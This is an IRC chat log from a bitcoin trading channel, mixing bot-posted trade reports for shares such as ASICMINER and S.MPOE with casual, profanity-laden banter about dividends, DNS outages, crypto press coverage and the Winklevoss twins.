Jun 15 22:48:33 hi, anyone has problems with bitcoincharts.com? Jun 15 22:49:03 it just refuses to DNS resolve on amazon ec2 , elsewhere it is fine Jun 15 22:49:33 jurov: i think tcatm is aware of the dns problem Jun 15 22:51:21 jurov: some dns server cache problem Jun 15 22:51:29 thx FabianB_ Jun 15 22:53:26 I think someone asked this before, but where do CoinURL ads actually display? Jun 15 22:53:30 Google? Jun 15 22:55:12 [BTCTC] [DMS.MINING] 1 @ 0.028 BTC [-] Jun 15 22:55:29 [BTCTC] [TAT.ASICMINER] 3 @ 0.0291 = 0.0873 BTC [+] Jun 15 22:55:41 some faucets, I think. But don't knwo for sure, would like to know, too. Jun 15 22:55:54 [BTCTC] [ASICMINER-PT] 1 @ 2.861001 BTC [-] Jun 15 22:55:56 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [-] Jun 15 22:58:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0291 BTC [+] Jun 15 22:58:58 [HAVELOCK] [ASICM] 1 @ 0.0294999 BTC [-] Jun 15 22:59:26 [BTCTC] [TAT.ASICMINER] 19 @ 0.0291 = 0.5529 BTC [+] Jun 15 23:00:37 http://www.bitcointrading.com/forum/index.php booby ad! Jun 15 23:09:34 [BTCTC] [TAT.ASICMINER] 13 @ 0.0289 = 0.3757 BTC [-] Jun 15 23:09:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.0289 = 0.4335 BTC [-] Jun 15 23:09:55 [HAVELOCK] [ASICM] 1 @ 0.02949988 BTC [-] Jun 15 23:10:10 [BTCTC] [TAT.ASICMINER] 10 @ 0.0285 = 0.285 BTC [-] Jun 15 23:10:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.0285 = 0.1425 BTC [-] Jun 15 23:10:41 That means I will play the Risto Pietilä, First Gamemaster and Viceroy of the Earth. Jun 15 23:10:45 I will only attend to events organized by Princes and above, and even then it has to be a special occasion. Jun 15 23:10:58 [BTCTC] [TAT.ASICMINER] 15 @ 0.0285 = 0.4275 BTC [-] Jun 15 23:12:07 Most of the things supernodes do (as supernodes) would be centered on meeting (each other), eating, drinking, smoking and dancing. Jun 15 23:12:18 no fucking? Jun 15 23:19:04 [HAVELOCK] [ASICM] 1 @ 0.029499 BTC [-] Jun 15 23:19:21 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [+] Jun 15 23:19:23 [BTCTC] [ASICMINER-PT] 3 @ 2.850101 = 8.5503 BTC [-] Jun 15 23:19:25 [BTCTC] [ASICMINER-PT] 1 @ 2.8501 BTC [-] Jun 15 23:19:26 [BTCTC] [ASICMINER-PT] 1 @ 2.850001 BTC [-] Jun 15 23:19:30 [BTCTC] [ASICMINER-PT] 1 @ 2.85 BTC [-] Jun 15 23:19:32 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [-] Jun 15 23:19:53 i don't think fins are allowed to fuck anymore Jun 15 23:19:57 they fucked it up. Jun 15 23:22:23 [MPEX] [S.MPOE] 6037 @ 0.00070184 = 4.237 BTC [-] Jun 15 23:22:25 [MPEX] [S.MPOE] 32126 @ 0.00070541 = 22.662 BTC [+] Jun 15 23:23:32 [BTCTC] [DMS.SELLING] 12 @ 0.039543 = 0.4745 BTC [+] Jun 15 23:23:35 [BTCTC] [DMS.SELLING] 1 @ 0.039544 BTC [+] Jun 15 23:23:37 [BTCTC] [DMS.SELLING] 20 @ 0.039544 = 0.7909 BTC [+] Jun 15 23:23:39 [BTCTC] [DMS.SELLING] 3 @ 0.039547 = 0.1186 BTC [+] Jun 15 23:23:40 [BTCTC] [DMS.SELLING] 8 @ 0.04 = 0.32 BTC [+] Jun 15 23:27:37 longest running con artist in bitcoin Jun 15 23:27:37 Mircea Popescu is a legend. Jun 15 23:27:37 hes an expert fraudster Jun 15 23:27:37 runs a classic boiler room scheme Jun 15 23:27:38 lol Jun 15 23:27:55 Mircea Popescu is one of the top 10 bitcoin trolls Jun 15 23:27:55 I know bout all that. Jun 15 23:28:14 you dont sell worthless shares to people now would you Mircea Popescu Jun 15 23:29:22 so it was tibuerius Jun 15 23:29:33 some moxipoxi guy yest here going on about it. Jun 15 23:29:40 check teh holy logs Jun 15 23:29:59 [BTCTC] [DMS.MINING] 1 @ 0.0275 BTC [-] Jun 15 23:30:00 [BTCTC] [DMS.MINING] 34 @ 0.027 = 0.918 BTC [-] Jun 15 23:30:36 [HAVELOCK] [ASICM] 2 @ 0.02945 = 0.0589 BTC [-] Jun 15 23:31:36 [BTCTC] [DMS.SELLING] 4 @ 0.04 = 0.16 BTC [+] Jun 15 23:31:41 [BTCTC] [DMS.SELLING] 10 @ 0.0405 = 0.405 BTC [+] Jun 15 23:31:42 [BTCTC] [DMS.SELLING] 10 @ 0.041 = 0.41 BTC [+] Jun 15 23:37:25 [BTCTC] [ASICMINER-PT] 1 @ 2.8425 BTC [-] Jun 15 23:37:27 [BTCTC] [ASICMINER-PT] 1 @ 2.842 BTC [-] Jun 15 23:37:32 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [-] Jun 15 23:37:33 [BTCTC] [ASICMINER-PT] 1 @ 2.82005 BTC [-] Jun 15 23:37:34 [BTCTC] [ASICMINER-PT] 2 @ 2.820002 = 5.64 BTC [-] Jun 15 23:37:35 [BTCTC] [ASICMINER-PT] 1 @ 2.82 BTC [-] Jun 15 23:38:59 [HAVELOCK] [ASICM] 6 @ 0.0293 = 0.1758 BTC [-] Jun 15 23:40:34 [BTCTC] [DMS.PURCHASE] 90 @ 0.066116 = 5.9504 BTC [-] Jun 15 23:41:40 [HAVELOCK] [ASICM] 49 @ 0.029449 = 1.443 BTC [+] Jun 15 23:41:55 [HAVELOCK] [ASICM] 42 @ 0.029449 = 1.2369 BTC [+] Jun 15 23:41:56 [HAVELOCK] [ASICM] 4 @ 0.02920005 = 0.1168 BTC [-] Jun 15 23:41:57 [HAVELOCK] [ASICM] 4 @ 0.02920003 = 0.1168 BTC [-] Jun 15 23:41:58 [HAVELOCK] [ASICM] 300 @ 0.02920002 = 8.76 BTC [-] Jun 15 23:44:42 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006998 BTC [-] Jun 15 23:45:50 [BTCTC] [TAT.ASICMINER] 10 @ 0.0286 = 0.286 BTC [+] Jun 15 23:46:59 [HAVELOCK] [ASICM] 48 @ 0.02920002 = 1.4016 BTC [-] Jun 15 23:47:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006998 BTC [-] Jun 15 23:47:17 [BTCTC] [COGNITIVE] 1 @ 0.317 BTC [-] Jun 15 23:47:41 [HAVELOCK] [HIM] 4 @ 0.3049 = 1.2196 BTC [+] Jun 15 23:47:53 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006998 = 0.07 BTC [-] Jun 15 23:49:57 [BTCTC] [DMS.MINING] 100 @ 0.028 = 2.8 BTC [+] Jun 15 23:53:17 [BTCTC] [ASICMINER-PT] 2 @ 2.8201 = 5.6402 BTC [+] Jun 15 23:54:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006998 BTC [-] Jun 15 23:54:52 [BTCTC] [ASICMINER-PT] 1 @ 2.849999 BTC [+] Jun 15 23:54:54 [BTCTC] [ASICMINER-PT] 4 @ 2.85 = 11.4 BTC [+] Jun 15 23:55:01 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.006998 = 0.2099 BTC [-] Jun 15 23:56:39 [BTCTC] [ASICMINER-PT] 4 @ 2.85 = 11.4 BTC [+] Jun 15 23:57:21 [HAVELOCK] [ASICM] 5 @ 0.02949999 = 0.1475 BTC [+] Jun 15 23:59:05 [HAVELOCK] [VTX] 1 @ 0.5 BTC [+] Jun 16 00:09:11 [BTCTC] [ASICMINER-PT] 2 @ 2.85 = 5.7 BTC [+] Jun 16 00:10:05 lol, why DDoS nameservers? Jun 16 00:10:07 [BTCTC] [ASICMINER-PT] 3 @ 2.85 = 8.55 BTC [+] Jun 16 00:16:25 [HAVELOCK] [ASICM] 7 @ 0.02940001 = 0.2058 BTC [-] Jun 16 00:16:26 [HAVELOCK] [ASICM] 4 @ 0.0293005 = 0.1172 BTC [-] Jun 16 00:16:27 [HAVELOCK] [ASICM] 2 @ 0.0293 = 0.0586 BTC [-] Jun 16 00:16:35 [BTCTC] [TAT.ASICMINER] 25 @ 0.02909 = 0.7273 BTC [+] Jun 16 00:17:44 [HAVELOCK] [ASICM] 1 @ 0.0293 BTC [-] Jun 16 00:19:36 [BTCTC] [DMS.SELLING] 1 @ 0.040996 BTC [-] Jun 16 00:20:46 [BTCTC] [DMS.SELLING] 6 @ 0.040996 = 0.246 BTC [-] Jun 16 00:20:47 [BTCTC] [DMS.SELLING] 11 @ 0.041 = 0.451 BTC [+] Jun 16 00:21:43 [BTCTC] [DMS.MINING] 12 @ 0.028 = 0.336 BTC [+] Jun 16 00:24:00 [BTCTC] [DMS.SELLING] 20 @ 0.041 = 0.82 BTC [+] Jun 16 00:26:39 woohoo. "Last Trades" on the order page now updates in real time from the websocket Jun 16 00:27:00 lol oops, ^ topace Jun 16 00:27:02 on havelock Jun 16 00:28:44 [BTCTC] [DMS.SELLING] 2 @ 0.041491 = 0.083 BTC [+] Jun 16 00:29:44 [BTCTC] [TAT.ASICMINER] 9 @ 0.02909 = 0.2618 BTC [+] Jun 16 00:29:50 [BTCTC] [DMS.SELLING] 5 @ 0.0415 = 0.2075 BTC [+] Jun 16 00:30:19 [BTCTC] [DMS.SELLING] 7 @ 0.041691 = 0.2918 BTC [+] Jun 16 00:30:45 [BTCTC] [DMS.SELLING] 1 @ 0.041 BTC [-] Jun 16 00:31:08 [BTCTC] [DMS.SELLING] 6 @ 0.04201 = 0.2521 BTC [+] Jun 16 00:33:51 [BTCTC] [DMS.MINING] 20 @ 0.027 = 0.54 BTC [-] Jun 16 00:34:15 [BTCTC] [DMS.SELLING] 122 @ 0.041 = 5.002 BTC [-] Jun 16 00:35:14 [BTCTC] [B.YABMC] 1 @ 0.011999 BTC [+] Jun 16 00:37:22 [BTCTC] [DMS.PURCHASE] 50 @ 0.066116 = 3.3058 BTC [-] Jun 16 00:37:46 [BTCTC] [DMS.PURCHASE] 10 @ 0.066116 = 0.6612 BTC [-] Jun 16 00:38:14 [HAVELOCK] [ASICM] 6 @ 0.029 = 0.174 BTC [-] Jun 16 00:43:36 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 16 00:45:15 [HAVELOCK] [ASICM] 17 @ 0.02949999 = 0.5015 BTC [+] Jun 16 00:45:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.02909 BTC [+] Jun 16 00:47:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.027 BTC [-] Jun 16 00:47:37 [BTCTC] [TAT.ASICMINER] 1 @ 0.02909 BTC [+] Jun 16 00:48:34 [MPEX] [S.MPOE] 1200 @ 0.00070749 = 0.849 BTC [+] Jun 16 00:53:25 [BTCTC] [BASIC-MINING] 9 @ 0.679301 = 6.1137 BTC [-] Jun 16 00:55:56 [HAVELOCK] [ASICM] 400 @ 0.02870001 = 11.48 BTC [-] Jun 16 00:57:08 [BTCTC] [ASICMINER-PT] 1 @ 2.8398 BTC [-] Jun 16 00:57:10 [BTCTC] [ASICMINER-PT] 1 @ 2.8399 BTC [+] Jun 16 00:58:45 [BTCTC] [TAT.ASICMINER] 17 @ 0.02909 = 0.4945 BTC [+] Jun 16 00:58:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [-] Jun 16 00:58:49 [BTCTC] [TAT.ASICMINER] 15 @ 0.0285 = 0.4275 BTC [-] Jun 16 00:58:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.028303 = 0.283 BTC [-] Jun 16 00:59:46 [BTCTC] [DMS.MINING] 33 @ 0.027 = 0.891 BTC [-] Jun 16 01:00:24 [BTCTC] [DMS.MINING] 12 @ 0.02799 = 0.3359 BTC [+] Jun 16 01:02:18 [HAVELOCK] [ASICM] 85 @ 0.02949999 = 2.5075 BTC [+] Jun 16 01:03:42 [BTCTC] [ASICMINER-PT] 25 @ 2.84 = 71 BTC [+] Jun 16 01:04:12 [HAVELOCK] [ASICM] 25 @ 0.0295 = 0.7375 BTC [+] Jun 16 01:04:58 [HAVELOCK] [ASICM] 4 @ 0.0295 = 0.118 BTC [+] Jun 16 01:05:25 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 16 01:05:35 [BTCTC] [DMS.MINING] 8 @ 0.02799 = 0.2239 BTC [+] Jun 16 01:09:52 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 16 01:12:26 KRS: what happened to "over everyone"? Jun 16 01:13:09 [BTCTC] [ASICMINER-PT] 4 @ 2.84 = 11.36 BTC [+] Jun 16 01:18:51 [BTCTC] [BTC-BOND] 10 @ 0.009803 = 0.098 BTC [-] Jun 16 01:19:31 [BTCTC] [BTC-BOND] 150 @ 0.009802 = 1.4703 BTC [-] Jun 16 01:20:08 [BTCTC] [BTC-BOND] 4 @ 0.009801 = 0.0392 BTC [-] Jun 16 01:20:10 [BTCTC] [BTC-BOND] 10 @ 0.009801 = 0.098 BTC [-] Jun 16 01:20:41 [BTCTC] [BTC-BOND] 5 @ 0.0098 = 0.049 BTC [-] Jun 16 01:21:08 [BTCTC] [BTC-BOND] 10 @ 0.009763 = 0.0976 BTC [-] Jun 16 01:21:36 [BTCTC] [BTC-BOND] 10 @ 0.009762 = 0.0976 BTC [-] Jun 16 01:22:11 [BTCTC] [BTC-BOND] 30 @ 0.00976 = 0.2928 BTC [-] Jun 16 01:25:16 [BTCTC] [ASICMINER-PT] 2 @ 2.84 = 5.68 BTC [+] Jun 16 01:25:28 [HAVELOCK] [ASICM] 3 @ 0.0295 = 0.0885 BTC [+] Jun 16 01:29:34 [HAVELOCK] [ASICM] 15 @ 0.02949999 = 0.4425 BTC [-] Jun 16 01:29:43 [HAVELOCK] [ASICM] 150 @ 0.0295 = 4.425 BTC [+] Jun 16 01:36:28 [HAVELOCK] [ASICM] 1 @ 0.0295 BTC [+] Jun 16 01:37:10 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 16 01:41:26 [BTCTC] [DMS.PURCHASE] 1 @ 0.066116 BTC [-] Jun 16 01:44:49 [BTCTC] [ASICMINER-PT] 3 @ 2.84 = 8.52 BTC [+] Jun 16 01:47:23 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 16 01:48:00 [BTCTC] [ASICMINER-PT] 2 @ 2.83 = 5.66 BTC [-] Jun 16 01:48:34 [BTCTC] [ASICMINER-PT] 2 @ 2.8251 = 5.6502 BTC [-] Jun 16 01:52:11 [HAVELOCK] [VTX] 2 @ 0.5 = 1 BTC [+] Jun 16 01:53:18 [HAVELOCK] [HIM] 1 @ 0.3049 BTC [+] Jun 16 01:55:33 [BTCTC] [TAT.ASICMINER] 5 @ 0.0291 = 0.1455 BTC [+] Jun 16 01:56:16 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 16 01:57:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.0291 = 0.1455 BTC [+] Jun 16 01:57:52 [HAVELOCK] [ASICM] 6 @ 0.0295 = 0.177 BTC [+] Jun 16 01:59:14 [HAVELOCK] [ASICM] 100 @ 0.0288 = 2.88 BTC [-] Jun 16 01:59:21 [HAVELOCK] [ASICM] 106 @ 0.02870007 = 3.0422 BTC [-] Jun 16 01:59:26 [HAVELOCK] [ASICM] 100 @ 0.02870006 = 2.87 BTC [-] Jun 16 02:05:10 [HAVELOCK] [SDICE] 2 @ 0.1901 = 0.3802 BTC [+] Jun 16 02:06:17 [HAVELOCK] [ASICM] 106 @ 0.02949999 = 3.127 BTC [+] Jun 16 02:06:17 [HAVELOCK] [ASICM] 51 @ 0.0295 = 1.5045 BTC [+] Jun 16 02:06:36 [MPEX] [S.MPOE] 4393 @ 0.00070749 = 3.108 BTC [+] Jun 16 02:06:38 [MPEX] [S.MPOE] 2600 @ 0.00071002 = 1.8461 BTC [+] Jun 16 02:08:13 [BTCTC] [ASICMINER-PT] 1 @ 2.84 BTC [+] Jun 16 02:10:35 [BTCTC] [TAT.ASICMINER] 2 @ 0.0291 = 0.0582 BTC [+] Jun 16 02:12:41 [HAVELOCK] [ASICM] 1 @ 0.0295 BTC [+] Jun 16 02:12:43 [BTCTC] [PAJKA.BOND] 25 @ 0.078 = 1.95 BTC [-] Jun 16 02:16:23 [HAVELOCK] [ASICM] 34 @ 0.0295 = 1.003 BTC [+] Jun 16 02:26:59 [HAVELOCK] [SDICE] 15 @ 0.1901 = 2.8515 BTC [+] Jun 16 02:34:14 [BTCTC] [ASICMINER-PT] 1 @ 2.820201 BTC [-] Jun 16 02:35:40 [BTCTC] [ASICMINER-PT] 3 @ 2.84 = 8.52 BTC [+] Jun 16 02:38:00 <[\\\]> uh oh Jun 16 02:38:04 <[\\\]> price is coming down Jun 16 02:38:10 [BTCTC] [ASICMINER-PT] 7 @ 2.84 = 19.88 BTC [+] Jun 16 02:38:15 [BTCTC] [ASICMINER-PT] 1 @ 2.821 BTC [-] Jun 16 02:39:39 [BTCTC] [DMS.PURCHASE] 85 @ 0.066116 = 5.6199 BTC [-] Jun 16 02:40:30 I think we'll consolidate around here for a bit Jun 16 02:40:38 95-105 Jun 16 02:40:56 we need an injection though Jun 16 02:41:03 otherwise it'll keep slipping Jun 16 02:43:51 [HAVELOCK] [ASICM] 3 @ 0.0295 = 0.0885 BTC [+] Jun 16 02:44:06 <[\\\]> think so? Jun 16 02:44:13 yep Jun 16 02:44:16 <[\\\]> I thought AM had a bunch of hash coming online? Jun 16 02:44:24 so? Jun 16 02:44:37 <[\\\]> well, it should maintain their divs Jun 16 02:44:53 sorry i thought you were referring to BTC/USD Jun 16 02:45:01 <[\\\]> oh, lol Jun 16 02:45:07 AM price always dips midway between divs Jun 16 02:45:13 itll rise again Tues Jun 16 02:45:17 <[\\\]> :D Jun 16 02:45:40 but odds are good this div wont be as good Jun 16 02:45:52 so market may react Jun 16 02:46:03 <[\\\]> it'll take a couple weeks for the new hash to come online Jun 16 02:46:14 <[\\\]> people reacting on a week to week are crazy Jun 16 02:46:22 <[\\\]> they need to be pricing based on the long term outlook Jun 16 02:46:33 <[\\\]> then again, bitcoiners aren't usually rational investors Jun 16 02:46:36 on Wall St people react to any news Jun 16 02:46:45 it's not that odd for people to react to divs Jun 16 02:47:16 <[\\\]> well Jun 16 02:47:23 <[\\\]> wall street divs aren't on a weekly basis Jun 16 02:48:13 indeed Jun 16 02:48:21 <[\\\]> equating wall street finance to bitcoin finance isn't always like comparing apples to apples Jun 16 02:48:28 agreed Jun 16 02:48:56 <[\\\]> whens the last time any bitcoin company was independently audited? Jun 16 02:49:01 this is a market of programmers, speculators, and idiots mostly Jun 16 02:49:09 <[\\\]> pretty much Jun 16 02:49:16 all 3 at once usually Jun 16 02:49:21 [BTCTC] [TAT.ASICMINER] 26 @ 0.0291 = 0.7566 BTC [+] Jun 16 02:49:23 [BTCTC] [TAT.ASICMINER] 14 @ 0.02948 = 0.4127 BTC [+] Jun 16 02:49:27 <[\\\]> at least 2 of the 3 Jun 16 02:49:45 [HAVELOCK] [VTX] 1 @ 0.485 BTC [-] Jun 16 02:50:00 [HAVELOCK] [ASICM] 10 @ 0.0295 = 0.295 BTC [+] Jun 16 02:50:34 [HAVELOCK] [ASICM] 6 @ 0.0295 = 0.177 BTC [+] Jun 16 02:50:36 some nonsense for ya: http://www.coindesk.com/prisms-effect-on-bitcoin-prices/ Jun 16 02:51:17 <[\\\]> yep Jun 16 02:51:19 <[\\\]> total nonsense Jun 16 02:51:24 [BTCTC] [DMS.MINING] 10 @ 0.02695 = 0.2695 BTC [-] Jun 16 02:51:30 [BTCTC] [ASICMINER-PT] 1 @ 2.913899 BTC [+] Jun 16 02:51:32 <[\\\]> what other events were going on in bitcoin land during that time? Jun 16 02:51:47 [BTCTC] [DMS.MINING] 20 @ 0.02681 = 0.5362 BTC [-] Jun 16 02:52:27 [BTCTC] [ASICMINER-PT] 1 @ 2.913899 BTC [+] Jun 16 02:52:37 stable price, lack of volume, and lack of new money Jun 16 02:52:45 dont need prism to change that Jun 16 02:53:17 [\\\] i think they're pretty funnay, the coindesk ppl. Jun 16 02:53:41 yest they were promoting tweets. because seeing a promoted tweet in my timeline is totally going to make me think hey, this is srs bzns Jun 16 02:53:45 i also love how at some point it became accepted fact that Cyprus caused bitcoin to rise so high Jun 16 02:53:52 <[\\\]> mircea_popescu: you bankrolling them to buy cheap coin? Jun 16 02:53:55 only among the idiots. Jun 16 02:54:19 [\\\] nope. i'm just enjoying the new coin* shit. the coinblab stuff was getting old. Jun 16 02:54:31 <[\\\]> because the people in cyprus, who couldn't get access to their bank accounts, suddenly got money into gox or other exchanges and bought.. all in a day. Jun 16 02:54:33 this includes the Winklevii and most presenters at btc conference Jun 16 02:54:47 <[\\\]> coinlab still exists? Jun 16 02:54:51 yeah Jun 16 02:55:05 as a twinkle Peter's eye Jun 16 02:55:26 how did winklevoss start getting pluralized as wilklevii when it doesn't really follow any standard etymology Jun 16 02:55:41 PalePhoenix pankkake peterl pgp2 pigeons pingec pizzaman1337 Populus PsychoticBoy Pucilowski Jun 16 02:55:44 i just like it Jun 16 02:55:48 [\\\] prolly in my memory only Jun 16 02:56:05 <[\\\]> copumpkin: its like calling computer mouses mice? Jun 16 02:56:19 winklevice? Jun 16 02:56:19 copumpkin i think it's the virus/virii plural form some retarded dropout working in the "press" remembered from his school days Jun 16 02:56:27 yeah, but even that one is wrong Jun 16 02:56:32 no argument. Jun 16 02:56:34 :) Jun 16 02:56:40 i assumed it was wrong Jun 16 02:56:43 <[\\\]> don't mess with copumpkin, he's one of those foreigners Jun 16 02:56:45 i just like it anyway Jun 16 02:56:49 <[\\\]> he speaks english better than the murikans Jun 16 02:56:53 mircea_popescu and I are co-foreigners Jun 16 02:57:00 <[\\\]> mircea_popescu is just a fucktard Jun 16 02:57:01 becauyse he had to, so they let him off tyhe boat in glasgow Jun 16 02:57:13 or wherever. Jun 16 02:57:23 [19:57:05] Message(432): cofucktard Erroneous Nickname Jun 16 02:57:24 :( Jun 16 02:57:26 <[\\\]> mircea_popescu: he has pretty bad gas.. you would let him off too Jun 16 02:57:29 CENSORSHIP Jun 16 02:57:44 fu. Jun 16 02:57:53 <[\\\]> now /join #freenode Jun 16 02:58:05 <[\\\]> ok Jun 16 02:58:11 <[\\\]> gotta watch the hawks game Jun 16 02:58:12 <[\\\]> ttyl Jun 16 02:58:42 lol Jun 16 02:58:45 hehe Jun 16 02:58:52 anyway, i still don't get who the fuck asked the jocks anything. Jun 16 02:59:12 they are just competitive sore losers Jun 16 02:59:19 still needing to 1-up Zuck Jun 16 02:59:23 it's like, two retards that are trying to draw attention to their fail lame facebook clone by frivosuing zuckerberg Jun 16 02:59:42 and a two-in-one retard trying to draw attention to his fatally flawed "crypto" torrent by being raped by the us govt Jun 16 02:59:49 how the fuck did we end up with this menajerie. Jun 16 02:59:51 bring amir back! Jun 16 02:59:55 lol Jun 16 03:00:22 i dunno winkles are at least hungry Jun 16 03:00:29 maybe theyll get more peeeps on this train Jun 16 03:01:04 btw guys... Jun 16 03:01:15 i didn't mean bring amir back for supercereal. i was just saying, ironically Jun 16 03:01:15 k ? Jun 16 03:01:27 he got all excited Jun 16 03:01:33 you so mean Jun 16 03:02:01 we need to get some of these bitcoin celebs chatting in here Jun 16 03:02:21 we have mjr, but he lacks ego Jun 16 03:02:24 lol Jun 16 03:02:48 (this is a compliment) Jun 16 03:03:52 we scared erik away Jun 16 03:05:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.14 BTC [+] Jun 16 03:07:43 I'mma buy some of these: https://personal.vanguard.com/us/funds/snapshot?FundId=0854&FundIntExt=INT Jun 16 03:08:38 [BTCTC] [DMS.MINING] 15 @ 0.02681 = 0.4022 BTC [-] Jun 16 03:09:15 <[\\\]> copumpkin, just buy bitcoins Jun 16 03:09:24 <[\\\]> your return would be 42%+ Jun 16 03:09:29 lol Jun 16 03:09:34 but look at that expense ratio! Jun 16 03:09:40 <[\\\]> you get what you pay for Jun 16 03:09:41 and that gives me tasty exposure to the market! Jun 16 03:09:43 dat exposure Jun 16 03:09:49 <[\\\]> there's no expense ratio because they're never in the office Jun 16 03:10:01 <[\\\]> its just some guy sitting in front of his laptop Jun 16 03:10:04 lol Jun 16 03:10:09 [BTCTC] [DMS.MINING] 40 @ 0.02695 = 1.078 BTC [+] Jun 16 03:10:10 did you see the minimum investment on it? Jun 16 03:10:15 <[\\\]> no Jun 16 03:10:19 <[\\\]> $100k? Jun 16 03:10:24 oh, that was the joke Jun 16 03:10:27 it's $200m Jun 16 03:10:27 <[\\\]> oh, $200M Jun 16 03:10:32 <[\\\]> lol Jun 16 03:10:37 a tad beyond my means right now Jun 16 03:10:39 maybe next year Jun 16 03:10:54 <[\\\]> you should just ask for a withdrawal of all of your bitcoin investments Jun 16 03:10:56 when each bitcoin is $1M Jun 16 03:11:06 <[\\\]> you've got at least $500M by now Jun 16 03:11:11 lol Jun 16 03:11:27 I don't think any way of counting would get me that high, unfortunately :) Jun 16 03:12:02 need to perform more sexual favors on billionaires Jun 16 03:12:12 <[\\\]> well, 10k coins at 7%/week over 2 years Jun 16 03:12:19 <[\\\]> valued at $100/coin Jun 16 03:12:19 lol Jun 16 03:12:29 <[\\\]> you've got $500M Jun 16 03:12:31 <[\\\]> easily Jun 16 03:12:34 oh excellent Jun 16 03:12:38 I'll call up trendon Jun 16 03:12:49 <[\\\]> just send him a facebook message Jun 16 03:12:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.0286 = 0.0858 BTC [-] Jun 16 03:12:59 <[\\\]> his is the one where's dressed up as a pirate Jun 16 03:13:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.0285 = 0.1425 BTC [-] Jun 16 03:13:03 [BTCTC] [TAT.ASICMINER] 2 @ 0.0283 = 0.0566 BTC [-] Jun 16 03:13:06 <[\\\]> where he's* Jun 16 03:14:10 [BTCTC] [DMS.MINING] 2 @ 0.028 = 0.056 BTC [+] Jun 16 03:14:15 [BTCTC] [TAT.ASICMINER] 15 @ 0.0283 = 0.4245 BTC [-] Jun 16 03:14:40 [BTCTC] [ASICMINER-PT] 1 @ 2.91689 BTC [+] Jun 16 03:14:43 [BTCTC] [ASICMINER-PT] 1 @ 2.9169 BTC [+] Jun 16 03:14:45 [BTCTC] [ASICMINER-PT] 2 @ 2.917 = 5.834 BTC [+] Jun 16 03:14:46 [BTCTC] [ASICMINER-PT] 1 @ 2.925 BTC [+] Jun 16 03:14:48 [BTCTC] [ASICMINER-PT] 2 @ 2.926 = 5.852 BTC [+] Jun 16 03:15:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.02948 BTC [+] Jun 16 03:20:03 [BTCTC] [ASICMINER-PT] 1 @ 2.926 BTC [+] Jun 16 03:21:20 [BTCTC] [TAT.ASICMINER] 2 @ 0.029479 = 0.059 BTC [-] Jun 16 03:22:16 [BTCTC] [TAT.ASICMINER] 15 @ 0.029479 = 0.4422 BTC [-] Jun 16 03:22:16 [BTCTC] [TAT.ASICMINER] 5 @ 0.02948 = 0.1474 BTC [+] Jun 16 03:23:19 [BTCTC] [TAT.ASICMINER] 10 @ 0.02949 = 0.2949 BTC [+] Jun 16 03:31:12 [BTCTC] [TAT.ASICMINER] 10 @ 0.0295 = 0.295 BTC [+] Jun 16 03:37:03 [BTCTC] [B.YABMC] 38 @ 0.011999 = 0.456 BTC [+] Jun 16 03:37:56 [BTCTC] [B.YABMC] 20 @ 0.012 = 0.24 BTC [+] Jun 16 03:38:00 [BTCTC] [B.YABMC] 62 @ 0.012 = 0.744 BTC [+] Jun 16 03:38:03 mp > https://bitcointalk.org/index.php?topic=235192.msg2486941#msg2486941 Jun 16 03:42:03 [BTCTC] [B.YABMC] 28 @ 0.0125 = 0.35 BTC [+] Jun 16 03:42:13 [BTCTC] [B.YABMC] 10 @ 0.0125 = 0.125 BTC [+] Jun 16 03:44:30 [BTCTC] [ASICMINER-PT] 1 @ 2.92595 BTC [-] Jun 16 03:44:32 [BTCTC] [ASICMINER-PT] 2 @ 2.92599 = 5.852 BTC [+] Jun 16 03:45:53 [BTCTC] [TAT.ASICMINER] 12 @ 0.029495 = 0.3539 BTC [-] Jun 16 03:45:55 [BTCTC] [TAT.ASICMINER] 42 @ 0.0295 = 1.239 BTC [+] Jun 16 03:45:59 [BTCTC] [TAT.ASICMINER] 3 @ 0.0295 = 0.0885 BTC [+] Jun 16 03:47:03 [BTCTC] [S.DICE-PT] 1 @ 0.00315 BTC [-] Jun 16 03:47:20 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.006998 = 0.021 BTC [-] Jun 16 03:51:40 lolk Jun 16 03:59:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006998 BTC [-] Jun 16 04:01:21 [BTCTC] [TAT.ASICMINER] 2 @ 0.0295 = 0.059 BTC [+] Jun 16 04:08:11 [HAVELOCK] [SDICE] 17 @ 0.1975 = 3.3575 BTC [+] Jun 16 04:22:47 [HAVELOCK] [ASICM] 14 @ 0.0294 = 0.4116 BTC [-] Jun 16 04:36:34 [MPEX] [S.MPOE] 2750 @ 0.00071319 = 1.9613 BTC [+] Jun 16 04:36:35 [MPEX] [S.MPOE] 4050 @ 0.00071324 = 2.8886 BTC [+] Jun 16 04:36:49 [MPEX] [S.MPOE] 2900 @ 0.00071586 = 2.076 BTC [+] Jun 16 04:37:50 assbot: you might like this https://www.youtube.com/watch?v=hR-NXv5Tma0 Jun 16 04:42:42 [BTCTC] [TAT.ASICMINER] 7 @ 0.0295 = 0.2065 BTC [+] Jun 16 04:49:31 ;;seen mod6 